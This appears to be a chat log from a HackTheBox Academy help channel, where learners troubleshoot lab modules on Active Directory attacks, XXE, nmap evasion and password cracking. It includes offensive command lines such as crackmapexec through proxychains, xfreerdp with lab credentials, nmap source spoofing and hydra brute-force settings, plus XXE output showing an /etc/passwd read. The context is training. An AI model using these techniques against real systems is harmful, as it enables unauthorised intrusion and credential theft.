I have no idea what went wrong though because I entered it with http:// as I did before, only difference now is that its giving me results

I know I caught myself accidentally doing resuls.txt instead of .json but I caught that before the new session...

This is genuinely more frustrating than software engineering, I hope it wont always be like this 😓

yeah it's really so much better than parrot

cs is frustrating

Hope I don't scare you away but:

get used to that frustration, most of the time in cyber you won't know what's going on on the back end, you'll try things you think would work but it wont because you're missing pieces of the puzzle. Being frustrated and stuck in the deep end to either swim or drown is the nature of cyber security

cs job market is even worse

not for blue team

its cooked for recent grads

I want to get some experience with Kali see which I prefer over the other

Also I wont be scared away, Softare engineering was one of the most soulless mindless tasks once you get the general bearings down. At least it was for the field I worked in. Same issues every time. Same code. Same crap. I wasn't creating or inventing something or coming up with creative solutions. So I'm sticking this through no matter what. Its way more enjoyable, but also way more difficult and frustrating

and yes it took me 800+ applications and 5 interviews to finally get a job as a Software Engineer

and I've been told entry level is also very rough for cybersec

But despite the stress I actually wake up looking forward to this, for the most part

can some one please give me pointer
like im still stuck since 5 hrs

what're you stuck on @unique ether ?

If its a CBBH/CWEE module feel free to dm me to avoid spoilers 🙂

Hey guys , having some wierd trouble proxychains is working, but for some reason cmb does not want to, it managed to get through once but connection dropped. is there a timeout setting or has someone had similar issues , This is for skills assessment 1 of Active directory enumeration and attacks

sudo proxychains crackmapexec smb 172.16.6.50 -u svc_sql -p xxxxx

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:135 ... OK
SMB 172.16.6.50 445 NONE [*] x64 (name:) (domain:) (signing:False) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
SMB 172.16.6.50 445 NONE [-] Connection Error: Error while reading from remote

Hi everyone
linux file transfer module task1
Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.
should i use request lib to download (passed with wget itself) however cant get requirements of task

othertimes all i get is sudo proxychains crackmapexec smb 172.16.6.50 -u svc_sql -p 'xxxxx'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:445 ... OK
then it dies

How do fix this error

Perhaps nothing is running locally on 8080?

Hello guys, I'm stuck on Tier 1 of the "Learn the basics of Penetration Testing" - Responder... I can't run the Responder.py bc the port 80 is already running the python from the PWNBox.. if I kill the process the Pwnbox close itself.

It's ok I just opened the solution

For hint I feel ashamed

I'm beyond cooked

hello

I am struggle to solve Advanced File Disclosure

module Web Attacks, can anyone help me ?

Lowercase p for port

can anyone help me ? HTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 11:21:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 44
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Check your email for further instructions.

Password Reuse / Default Passwords

Found a zipped folder on the host, does this require cracking? Not sure if I'm running down a rabbit hole or not - please @ with any responses thanks

can anyone help me with the request on burp suit to get the flag ?

yeeaaa, im stuck on easy SOMEHOW, gonna reread whole module hahah

Has anyone finished the prompt injection attacks module ?

i need help

HTTP/1.1 200 OK
Date: Tue, 25 Mar 2025 12:33:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1141
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>: DOMDocument::loadXML(): internal error: xmlParseInternalSubset: error detected in Markup declaration in file:///etc/passwd, line: 1 in <b>/var/www/html/error/submitDetails.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>: DOMDocument::loadXML(): Entity 'file' not defined in Entity, line: 5 in <b>/var/www/html/error/submitDetails.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>: simplexml_import_dom(): Invalid Nodetype to import in <b>/var/www/html/error/submitDetails.php</b> on line <b>12</b><br />
<br />
<b>Notice</b>: Trying to get property 'name' of non-object in <b>/var/www/html/error/submitDetails.php</b> on line <b>13</b><br />
<br />
<b>Notice</b>: Trying to get property 'tel' of non-object in <b>/var/www/html/error/submitDetails.php</b> on line <b>14</b><br />
<br />
<b>Notice</b>: Trying to get property 'email' of non-object in <b>/var/www/html/error/submitDetails.php</b> on line <b>15</b><br />
<br />
<b>Notice</b>: Trying to get property 'message' of non-object in <b>/var/www/html/error/submitDetails.php</b> on line <b>16</b><br />
Check your email for further instructions.

I am still stuck here , there isn t anyone to help?

I usually just open the cheetsheet which also acts as a sort of refresher for me

@nimble scroll feel free to dm me what you got

is it okay if i use chatgpt to explain the displayed information i get from the nmap scan? like what these means:
Service scan sending probe DNSVersionBindReq to 10.129.2.48:53 (udp)
NSOCK INFO [2.2950s] nsock_write(): Write request for 30 bytes to IOD #1 EID 19 [10.129.2.48:53]
NSOCK INFO [2.2950s] nsock_read(): Read request from IOD #1 [10.129.2.48:53] (timeout: 5000ms) EID 26

Yes, its allowed

atleast for CPTS

I may just be being rrly dumb here. I've just started, and am on linux fundamentals.

Q: "What is the index number of the "sudoers" file in the "/etc" directory?" I put in the command ls -i /etc/, and found the sudoers file, put in the number next to it, it's saying it's wrong

Are you ssh to the target?

right, yep, i was being dumb, thankyou!

Rabbit hole, the question tells you where to look

Module: ADCS Attacks
Section: PKINIT

When i obtain administrator certificate by exploiting esc1, extracting public key from certificate gives me an empty .crt file, but extracting private key works fine.

Module is above tier 0, please remove screenshot

If you want to suggest a fix or error in the module #1234357888114364508 <--

Sorry, didnt know that my screenshot can be a spoiler 😄

When erratum is added?

It contains content from the lab environment, so yes it's a spoiler

Wdym the channel? Its been there forever

Lol, I never opened it.

if I remove private key content, am I be able to add screenshot then?

Yeah; #1234357888114364508 is more lenient but you can spoiler the image

Got it will try again, thanks

If you still run into issues, feel free to DM and I can see if it is something command related.

Can anyone give me a work
I need to earn

This isn't a 4hire server read and follow #welcome

Ok

Sis

• How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234.
• How many members did HackTheBox have on the 10th June 2017? Answer with an integer, eg 1234.
  please help me on this , waybackmachine deosen't work !
  Module: Information Gathering - Web Edition

What exactly do you mean by “waybackmachine deosen't work”?
The website is working.

i answer all the Questions and waybackmachine work until this two qustions he don't give me the pages

HTB used a different ||top-level domain|| in the past.

i used this hackthebox.com

Read my hint again. ||com is not correct.||

how i can know the top-level domains HTB have used in the past ?

whois cmd ?

think what relative region that hackthebox resides in ||(They were founded, and main HQ is still, in Greece, which is part of...)||

Surf through old versions of the website, which you can find on WayBackMachine. Take a look at the links.

i solve it, thanks very much

Hey guys! I'm doing the web attacks module. CURL is not working for me. When I run "curl -i -X OPTIONS http://SERVER_IP:PORT/" it should print me the allowed methods like in the guide. However, it doesn't work for me for some reason...? Does anyone know how to fix this issuea?

First picture is what I get,

The second is what should happen:

examples won't always match up to what you do; though you can chuck it in #1234357888114364508 that the target should respond to the -X OPTIONS request

Alright, thanks!

Quick question : during assessments, is it common to look into the /opt/scripts directory ?

i mean if it exists it's not a bad place to look

@signal hound your screenshot contains spoilers for a password redact it and reupload the image

Hi im doing AD enumeration and attacks
I am trying to rdp to MS01
I tried using metasploit
And netsh to portforward but i get errors when im trying to rdp
When i use /cert-ignore i get "timeout waiting for activation"

I guess so yeah, but I didn't know it could be THAT pertinent. What are the things you'd check as a "reflex" when having a foothold ? Other than SUID files, capabilities, Path, Cron, Systemd.. ?

on htb machines always sudo -l and 90% of the time you get the tool needed for escalation right there lol

Try adding a /timeout so like this: xfreerdp /v:172.16.6.35 /u:'inlanefreight.local\james' /p:'mypassword' /dynamic-resolution /timeout:30000

You can also try another tool like rdesktop and remmina

Also that accounts a service sql account, so make sure it has rdp privileges, if not try connecting to mssql with mssqlclient.py

That was my first idea as well x) but it didn't work in that case 👀

Anyone available for a hand on the RDLL Injection - Implementation Question 2 (Process Injection Attacks and Detection). Been stuck on this for most of the day. Cant figure out where im going wrong. Thank you.

Hi, guys. I can't understand why any search bar or form of the final skill assessment of the sqlmap module is sending a request to the web app's back-end

Hi,
I'm trying to get the OS name from the target in Firewall and IDS/IPS Evasion - Easy Lab, here's what I did:

sudo nmap <target_ip>/24 -sn -oA host -PE --reason to get the neighbors IPs
then
sudo nmap <target_ip> -p<port> -n -Pn -O -S <ip_from_the_above> -e tun0
and here I get the error:

setup_target: failed to determine route to 10.129.2.80
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.09 seconds

am I doing smth wrong?

are you trying to work out the OS, or the hostname of the system ?

OS

See if this works :D. ping -c 1 <target-ip>, if you can get the ttl (time to live) if its 128 its likely windows, if its 64 its linux

cannot do haha 0 received

my ip is blocked then or?

so your blocked from sending icmp (pings)

You're doing far too much here

try scanning with -Pn

sudo nmap 10.129.2.80 -p80 -sS -O -Pn -n --disable-arp-ping -source port 53 did this too

-S also doesn't do what I think you think it's doing.

but the answer is incorret

Also i believe it's just asking the base OS not full flavor

its setting source IP, right?

I'm giving base OS as the answer and its incorret haha

can I send the SS in priv? cuz I guess I can't send it here cuz its the result of a scan

@fathom pendant

try -T 0? 😄 and ss is a syn scan

Why would you set the source as the target and expect a response?

You're likely overthinking it

Normally I wouldn't but if i find it in your screenshot you owe me a beer

it was an example in the module 😭

Not everything in the examples will be doable

There's reading surrounding the examples that give them more context

--dns-server <ns> try specify their dns, just spit balling ideas

try some of these, -PS443, -PA80, -PA443, -PS80

-PE -PS80 -PS443 -PP -PU40125 -PS3389 -PA21 -PU161 --source-port 53 this one is a beast of a command also

that's doing WAY too much work

the module this is from doesn't touch on half of what you put there

try SECLISTS http-request-methods.txt and just run through each one in intruder

Intruder do be slow though(on free burp at least), probably grab a plugin instead

if you've not got burp pro, id just use ffuf

Hey, guys. I'm brand new to HTB but not to wi-fi hacking. I'm doing the WPS Reconnaissance module. When I open up the target system, there is no wlan0 interface. Any advice would be appreciated.

https://academy.hackthebox.com/module/186/section/1958

cant go too far with wi-fi hacking without a wlan interface 😉

by "open up" do you mean ssh or rdp in? because the pwnbox != the target;
Spawn Instance != Spawn Target

I can spawn the instance and have access to the environment.

Spawning instance spawns the pwnbox, not the target that would have the wlan0 interface

:)

ya, im brand new...thanks

there should be instructions above the question that state <ssh|rdp> to <ip> with username "something" and password "something"

but I have been performing wi-fi pen test for 6 years

ok?

checking...

i'm telling you how the targets and questions work on htb academy

yes. thank you

spawn target spawns the actual lab that would have the required stuff to do

since you can utilize your own machine/vm to connect to the labs

Just rechecking in seeing if anyone would be available for a hand with Refelcted DLL IMplentation, question 2. I have located the LoadLibraryA() in both IDA and x64dbg. cannot find the hash to save my life. Could use a nudge.

thank you....this is where I am at.

you can't share images because your account isn't linked

I misssed this part 😓

a lot of it is explained in the INtro to Academy module 😉

yaa...lol I'll do that (the Intro to Academy Module). thank you

should have been the first thing loaded up when you created your academy account

cannot login with provided credentials on https://academy.hackthebox.com/module/147/section/1639

xfreerdp /v:10.129.175.164 /u:Administrator /p:AnotherC0mpl3xP4$$

[18:03:43:170] [6235:6236] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:03:43:170] [6235:6236] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[18:03:43:371] [6235:6236] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[18:03:43:371] [6235:6236] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[18:03:43:371] [6235:6236] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - 

Put your password in single quotes.

wrap password in single quotes

if you're curious why echo AnotherC0mpl3xp4$$ and see what it outputs, that's what bash is seeing as the pw

Thank you @fathom pendant , i also needed to add the /sec:tls that was throwing the error

well the main issue here is > STATUS_LOGON_FAILURE

meaning that no matter what it's not logging in with invalid creds

if you have invalid creds you get a RDP session and it shows the error on the new screen saying invalid credentials if you got the IP and username right. In this case the second screen did not open at all, and yes it needed to be inside single quotes

not with xfreerdp

can i upload images here?

xfreerdp throws the error without setting up the rdp session with invalid creds

maybe rdesktop or other tools do that

could i share pictures here?

yes

okay

since it wouldn't contain a spoiler

literally as long as it doesn't spoil the module (contain creds that you had to hunt for or other things you had to search for) you're fine

no it shows only the provided creds

weird

but eh as long as the password works and logs you in; you're fine

yeah, thank you for the response ❤️

i don't think i've ever used the /sec:tls option

also you don't wrap '/p:password' it's just /p:'password'

just as a standard use

it works both ways

i'm aware

just informing standard use case just in case the tool gets an update and that no longer becomes valid syntax

hello lads can anyone help im doing the right thing maybe im using the wrong list

??

You cracked kiras password in the credential hunting linux section

not kira the zip file homie

I used rockyou

Mutated wordlist will crack it from what i recall

same didnt work

try the provided word lists

Make sure the 2john tool didn't output an empty line/string

this is the only thing I hate about this module (actively doing hard lab rn), is that it is mostly guessing and waiting

what word list did you use for it

am using the mutated one

you just said rockyou tho

ohh you mean for the zip file? yeah I used rockyou, I thought you mean for the hard lab

good luck homie

[STATUS] 63.33 tries/min, 190 tries in 00:03h, 93856 to do in 24:42h, 2 active
long wait to go

can i send you an ss and tell me what im doing wrong??

?

damn

just try cracking it with any of the wordlists provided

cos I do have a few different versions of rockyou

~~made a mutated one just for the fun of it ~~

LOL

did you transfer the zipped file to your machine?

or did you unhash it on kira @waxen totem

transfer to my machine

same

can you send me the wordlist you used please

you would be a fucking champ man

they said they used rockyou

lol

I DID FAM

try the other wordlists

I DID

if it ain't working don't force it

shouldn't take more than 1 min to crack ngl

took mine 2 seconds

im using my own machine

is the hashfile empty?

a long way to do this on pwn

nope its the word lists fault can i send you an ss?

no

lol

i've already done my free DM help for the day

:)

fair enough

have you tried the mutated wordlist?

i just did thank you

Yoo quick question about the Password Attacks Hard Lab, I found a massive file, am I supposed to transfer this over to my machine?

depends on the file but typically: yes

question when using hydra for ftp attacks, I swear I read -t 48 was recommended for speeding up the process

that was like the max

or maybe 46

ahh yea has to 46 I see the time short now

nvm

Some protocols might be faster also

maybe 64

[STATUS] 256.00 tries/min, 256 tries in 00:01h, 93788 to do in 06:07h, 16 active

How do I keep the windows machines from blowing up on me in the password section. I tried opening a notepad file and the RDP blew up and i gotta restart the server

so that is the default I guess 16

Yeah default is 16

[SATUS] 864.00 tries/min, 864 tries in 00:01h, 93194 to do in 01:48h, 50 active

nice so I set it to 64 I guess it went to 50

other wise this module is going to take 5 hours lol

Kill me

For Case6 on Attack tuning - SQLMap essentials; is the command supposed to take a long time?

Can I post the command I’m using?

sigh went from my rdp constantly crashing on the windows machines to just Destination Host Unreachable - switching from UDP vpn to TCP solved my RDP issues

@fleet moth no spoilers from modules please

How am I supposed to share my concerns@cloud urchin ? Besides I haven't mentioned anything that is not to be found on the HTB forum.

You can simply ask without posting content from the module as it's above tier 0

if you need to go deeper with info then you can ask if someone will DM

Lul

hi guys

I asked in general where to ask for help in my linux lab question problem and i was referred to this chat

anyway

Im in linux lab and idk why is this answer wrong, i even tried losing the / at the beginning and still wrong, i double checked with "echo $HOME" and "cat /etc/passwd | grep home" to double check my home dir and idk why its still wrong, tried diff browser, refreshing and still nothing, any help?

Are you sshd into the target?

if by that you mean im using the virtual machine web thingy that they offer then yes

forgive my ignorace, im new

only replying in case you're not in the chat atm

No i mean you have to spawn the target and ssh into the target

https://quickref.me/ssh.html

I clicked on the spawn button, then interact, now im in a new tab, with the linux machine and terminal open

That's different that's the pwnbox, not the target

Look just slightly above the question

Please don't post answers for the challenges guys

oh

Yeah mb didn't realize there was one of the answers in it

the ssh thing wasnt covered

Yeah which is why I sent a link to ssh cheatsheet

do i spawn my virtual box kali and use its terminal ?

or use it from whithin the web one that htb offers

omg, is that like connecting as a different user ???

You'd have to use the VPN to it but you can

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

they offered some vpn file to download, but again im kind of skeptical and also ignorant when it comes to this, idk why they didnt cover it first

I'll read it

Heck it's preferred to use the vpn

alright I'll read it for now and use the cheatsheet u provided

A VPN is essentially a network with your computer and the target in it

thanks so much @waxen totem

No ping ples

hey there, to ssh, i need to know the name@ip, they only provided me with a name and password

Did you spawn the target? 👀

It will give you an ip

i feel so stupid lol

thanks man, already done this and im in and solved it

but there is this question

i used ls in my home dir and there was nothing, kept spoofing around and this was the only mail thing i found, im confused

hello

im on the information gathering web edition and im on the way back machine think but for some reason this keeps popping up when i check htb 2018 aug 8

Might wanna, check EVERYTHING, you were told to

what i do

That's because Hack the box wasn't hackthebox.com in 2018

oh what was it

know your target 👀

that's for you to figure it out

Hi, I have a question I was practicing with ligolo and I established a connection with double pivot but when I try to start second tunnel it showed me this error:
error: a tunnel is already using this interface name. Please use a different name using the --tun option

If anyone could help me with why and how to resolve this issuer. Much appreciated

https://docs.ligolo.ng/sample/basic/

This shows how to add another interface, route, and tunnel

https://docs.ligolo.ng/sample/double/

Thank you, I appreciate it